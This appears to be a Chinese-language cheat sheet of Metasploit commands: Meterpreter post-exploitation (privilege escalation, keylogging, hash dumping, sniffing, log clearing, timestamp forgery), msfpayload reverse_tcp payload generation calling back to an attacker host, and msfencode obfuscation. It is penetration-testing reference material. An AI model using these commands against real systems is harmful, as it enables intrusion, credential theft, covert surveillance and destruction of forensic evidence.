MSF终端命令

getsystem
通过各种攻击向量来提升系统用户权限 。

execute -f cmd.exe -i
执行cmd.exe命令并进行交互 。

execute -f cmd.exe -i -t
以所有可用令牌来执行cmd命令并隐藏该进程 。

rev2self
回到控制目标主机的初始用户账户下 。

reg command
在目标主机注册表中进行交互,创建,删除,查询等操作 。

setdesktop number
切换到另一个用户界面(该功能基于那些用户已登录) 。

screenshot
对目标主机的屏幕进行截图 。

upload file
向目标主机上传文件 。

download file
从目标主机下载文件 。

keyscan_start
针对远程目标主机开启键盘记录功能 。

keyscan_dump
存储目标主机上捕获的键盘记录 。

keyscan_stop
停止针对目标主机的键盘记录 。

getprivs
尽可能多的获取目标主机上的特权 。

uictl enable keyboard/mouse
接管目标主机的键盘和鼠标 。

background
将你当前的metasploit shell转为后台执行 。

hashdump
导出目标主机中的口令哈希值 。

use sniffer
加载嗅探模式 。

sniffer_interfaces
列出目标主机所有开放的网络端口 。

sniffer_dump interfaceID pcapname
在目标主机上启动嗅探 。

sniffer_start interfaceID packet-buffer
在目标主机上针对特定范围的数据包缓冲区启动嗅探 。

sniffer_stats interfaceID
获取正在实施嗅探网络接口的统计数据 。

sniffer_stop interfaceID
停止嗅探 。

add_user username password -h ip
在远程目标主机上添加一个用户 。

clearev
清楚目标主机上的日志记录 。

timestomp
修改文件属性,例如修改文件的创建时间(反取证调查) 。

reboot
重启目标主机 。

***MSFpayload命令***

msfpayload -h
msfpayload的帮助信息 。

msfpayload windows/meterpreter/bind_tcp O
列出所有windows/meterpreter/bind_tcp下可用的攻击载荷的配置项(任何攻击载荷都是可用配置的) 。

msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe
创建一个metasploit的reverse_tcp攻击载荷,回连到LHOSTip的LPORT,将其保存为名为payload.exe的windows下可执行程序 。

msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw
创建一个metasploit的reverse_tcp攻击载荷,回连到LHOSTip的LPORT,将其保存为名为payload.raw,该文件后面的msffencode中使用 。

msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c
创建一个metasploit的reverse_tcp攻击载荷,导出C格式的shellcode 。

msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java
创建一个metasploit的reverse_tcp攻击载荷,导出成以%u编码方式的javaScript语言字符串 。

***msfencode命令***

mefencode -h
列出msfencode的帮助命令 。

msfencode -l
列出所有可用的编码器 。

msfencode -t (c,elf,exe,java,is_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)
显示编码缓冲区的格式 。

msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
使用shikata_ga_nai编码器对payload.raw文件进行5编码,然后导出一个名为encoded_payload.exe的文件 。

    推荐阅读